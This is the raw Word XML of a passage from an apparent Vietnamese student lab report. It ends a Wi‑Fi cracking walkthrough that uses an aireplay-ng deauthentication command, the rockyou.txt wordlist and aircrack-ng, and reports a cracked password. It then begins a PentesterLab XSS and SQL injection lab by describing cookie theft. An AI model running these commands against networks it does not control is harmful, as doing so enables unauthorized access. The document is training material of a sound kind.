          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Pmkid” xuất hiện.</w:t>
      </w:r>
      <w:r w:rsidR="00F12C2B" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Sau khi có sự xuất hiện của thẻ Pmkid cùng với địa chỉ Mac hiện ra ở góc trên bên phải màn hình.</w:t>
      </w:r>
      <w:r w:rsidR="00E719D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Bạn có thể tiếp tục.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDC5266" w14:textId="7C1ADA8C"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color w:val="000000"/>
        </w:rPr>
        <w:t>*Nếu trường hợp không có sự xuất hiện của “handshake” “hoặc Pmkid”.</w:t>
      </w:r>
      <w:r w:rsidR="00F12C2B" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Ta sẽ sử dụng câu lệnh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7851DC42" w14:textId="77777777" w:rsidR="000A1434" w:rsidRPr="00F12C2B" w:rsidRDefault="000A1434" w:rsidP="000A1434">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Aireplay-ng -0 2 -a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>D4:9A:A</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">0:11:37:21 -c EA:8B:72:F3:84:D0 wlan0mon. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Trong đó:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777BBB92" w14:textId="77777777" w:rsidR="000A1434" w:rsidRPr="00F12C2B" w:rsidRDefault="000A1434" w:rsidP="000A1434">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>ꞏ</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  "2" là số gói mà bạn sẽ gửi. Bạn có thể tăng hoặc giảm, nhưng lưu ý là nếu gửi nhiều hơn 2 gói có thể gây ra lỗ hổng bảo mật đáng chú ý. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D7C9F2" w14:textId="77777777" w:rsidR="000A1434" w:rsidRPr="00F12C2B" w:rsidRDefault="000A1434" w:rsidP="000A1434">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>ꞏ</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>D4:9A:A</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">0:11:37:21 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>là địa chỉ MAC của wifi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516B3722" w14:textId="77777777" w:rsidR="000A1434" w:rsidRPr="00F12C2B" w:rsidRDefault="000A1434" w:rsidP="000A1434">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>ꞏ</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>EA:8B:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>72:F</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">3:84:D0 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>chính là STATION của wifi mà người dùng đặt nhập ta có được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192EF49C" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t>ꞏ</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nhớ thay "wlan0mon" bằng tên giao diện mà bạn đã xác định vào lúc đầu khi máy tính tìm bộ định tuyến.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396AD5AC" w14:textId="7FC3CB01"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rPr>
        <w:pict w14:anchorId="7C9874BF">
          <v:shape id="Hình ảnh 162" o:spid="_x0000_i1068" type="#_x0000_t75" style="width:468pt;height:29.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId53" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5293E885" w14:textId="77777777"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Mởi lại cửa sổ Terminal lúc đầu ta được kết quả:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4C29A2" w14:textId="31CF4926"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rPr>
        <w:pict w14:anchorId="10B6044A">
          <v:shape id="Hình ảnh 163" o:spid="_x0000_i1069" type="#_x0000_t75" style="width:468pt;height:312.75pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId54" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E5F43B" w14:textId="77777777"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 xml:space="preserve">Đã có sự xuất hiện của </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>PMKID:D4:9A</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>:A0:11:37:21.Nhấn thoát để kết thúc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD7671B" w14:textId="3AE5A3DD"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Bước 10:</w:t>
      </w:r>
      <w:r w:rsidR="00E719D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Kiểm tra tập tin Desktop-02.cap từ bước 8 bằng cách gõ Terminal và gõ lệnh ls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219B5166" w14:textId="29031D66"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rPr>
        <w:pict w14:anchorId="5A311BC4">
          <v:shape id="Hình ảnh 164" o:spid="_x0000_i1070" type="#_x0000_t75" style="width:468pt;height:254.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId55" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8E80AF" w14:textId="16CC368B"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Bước 11:</w:t>
      </w:r>
      <w:r w:rsidR="00E719D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Tiến hành truy cập vào google tải file </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>rockyou.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> để tiến hành </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bruteforce</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> mật khẩu wifi từ file </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Desktop-02.cap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEB901E" w14:textId="5ECB56EF"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rPr>
        <w:pict w14:anchorId="0AC9122F">
          <v:shape id="Hình ảnh 165" o:spid="_x0000_i1071" type="#_x0000_t75" style="width:468pt;height:197.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId56" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3704A0DF" w14:textId="418361C6"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rPr>
        <w:pict w14:anchorId="45F4202E">
          <v:shape id="Hình ảnh 166" o:spid="_x0000_i1072" type="#_x0000_t75" style="width:468pt;height:389.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId57" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="479C59E9" w14:textId="682FF15A"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Bước 12:</w:t>
      </w:r>
      <w:r w:rsidR="00E719D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Để </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>crack password</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00E719D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>ta sử dụng lệnh sau:</w:t>
      </w:r>
      <w:r w:rsidR="00E719D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>aircrack-ng -w rockyou.txt Desktop-02.cap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543223BF" w14:textId="124AF585"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Lưu ý:</w:t>
      </w:r>
      <w:r w:rsidR="00E719D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">bạn phải sử dụng lệnh cd đến đường dẫn chứa file </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>rockyou.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00E719D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Sau đó kéo file </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Desktop-02.cap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> vào </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Terminal</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> phía sau file </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>rockyou.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>.Ta</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> được kết quả:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22924A01" w14:textId="63BC7DC5" w:rsidR="000A1434" w:rsidRPr="00F12C2B" w:rsidRDefault="00283404" w:rsidP="000A1434">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="4"/>
          <w:szCs w:val="4"/>
        </w:rPr>
        <w:pict w14:anchorId="1731920B">
          <v:shape id="Hình ảnh 167" o:spid="_x0000_i1073" type="#_x0000_t75" style="width:468pt;height:348pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId58" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="650830F8" w14:textId="60B9B167" w:rsidR="000A1434" w:rsidRPr="00F12C2B" w:rsidRDefault="000A1434" w:rsidP="000A1434">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Ta chờ đến khi quá trình </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bruteforce</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> hoàn tất.</w:t>
      </w:r>
      <w:r w:rsidR="00E719D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Ta thu được </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> là </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hongphuc123</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E57860" w14:textId="06CB5125" w:rsidR="00FA2235"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LAB 2:</w:t>
      </w:r>
      <w:r w:rsidR="000A1434" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> XXS and MySQL FILE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F4B8A8" w14:textId="7581CB3C" w:rsidR="000A1434" w:rsidRPr="00F12C2B" w:rsidRDefault="000A1434" w:rsidP="000A1434">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1.Giới thiệu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5ABCDB" w14:textId="501B5673" w:rsidR="009815BF" w:rsidRPr="00F12C2B" w:rsidRDefault="009815BF" w:rsidP="009815BF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Link bài lab:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D051D1" w14:textId="5306A5BE" w:rsidR="009815BF" w:rsidRPr="00F12C2B" w:rsidRDefault="008228FC" w:rsidP="009815BF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId59" w:history="1">
        <w:r w:rsidR="009815BF" w:rsidRPr="00F12C2B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          </w:rPr>
          <w:t>https://pentesterlab.com/exercises/xss_and_mysql_file/course?fbclid=IwAR3SqJOwvpsVd3OD6kWN4DiwtS6Bdo5O8tfyruDY5_MvNEKsB3V7Tmqb6h0</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="009815BF" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407CE973" w14:textId="0EFE05C7" w:rsidR="000A1434" w:rsidRPr="00F12C2B" w:rsidRDefault="000A1434" w:rsidP="000A1434">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Trong phần bài tập đầu tiên, tôi sẽ trình bày cho các bạn một cách chi tiết về cách khai khác lỗ hổng XSS</w:t>
      </w:r>
      <w:r w:rsidR="00E707D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>(hay còn gọi là Cross-Site-Scripting), được thực thi trên một trang web viết trên nền tảng PHP và cách kẻ tấn công có thể sử dụng nó để truy cập vào website dưới quyền quản trị viên.</w:t>
      </w:r>
      <w:r w:rsidR="00E707D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Sao đó,</w:t>
      </w:r>
      <w:r w:rsidR="00E707D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>dưới quyền truy cập này, kẻ tấn công sẽ thực thi các đoạn mã độc hại trên máy chủ của nạn nhân để thu thập thông tin của trang web bằng cách sử dụng SQL injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1314B6B9" w14:textId="77777777" w:rsidR="000A1434" w:rsidRPr="00F12C2B" w:rsidRDefault="000A1434" w:rsidP="000A1434">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Trước tiên chúng ta cần tìm hiểu về kỹ thuật tấn cống XSS và SQL injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB297CC" w14:textId="77777777" w:rsidR="000A1434" w:rsidRPr="00F12C2B" w:rsidRDefault="000A1434" w:rsidP="000A1434">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">ꞏ </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>XSS (là viết tắt của cụm từ Cross-Site Scripting) hiểu đơn giản là một hình thức tấn công bằng mã độc phổ biến, trong đó, hacker sẽ lợi dụng các lỗ hổng để chèn các mã script vào, sau đó gửi cho người dùng (hoặc người dùng vô tình truy cập vào trang bị nhiễm mã độc). Qua đó đánh cắp thông tin Cookie của người dùng và dùng nó để đăng nhập các tài khoản trên website bị nhiễm mã độc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A76369E" w14:textId="40DCE5F1" w:rsidR="000A1434" w:rsidRPr="00F12C2B" w:rsidRDefault="000A1434" w:rsidP="000A1434">
